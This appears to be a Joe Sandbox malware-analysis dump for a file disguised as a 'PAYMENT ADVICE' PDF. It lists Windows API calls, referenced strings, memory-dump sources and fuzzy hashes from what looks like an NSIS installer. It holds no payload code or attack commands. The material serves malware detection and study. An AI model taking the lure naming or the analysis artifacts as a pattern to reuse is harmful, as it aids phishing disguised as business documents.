                                                                                                                • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 1975747703-1115850852
                                                                                                                • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                APIs
                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                • API String ID: 222337774-899692902
                                                                                                                • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: A
                                                                                                                • API String ID: 2624150263-3554254475
                                                                                                                • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                • Error launching installer, xrefs: 00402E3E
                                                                                                                • Null, xrefs: 00402EE5
                                                                                                                • (*B, xrefs: 00402E7C
                                                                                                                • soft, xrefs: 00402EDC
                                                                                                                • Inst, xrefs: 00402ED3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 4283519449-2478819026
                                                                                                                • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                Strings
                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 900638850-730719616
                                                                                                                • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                Strings
                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
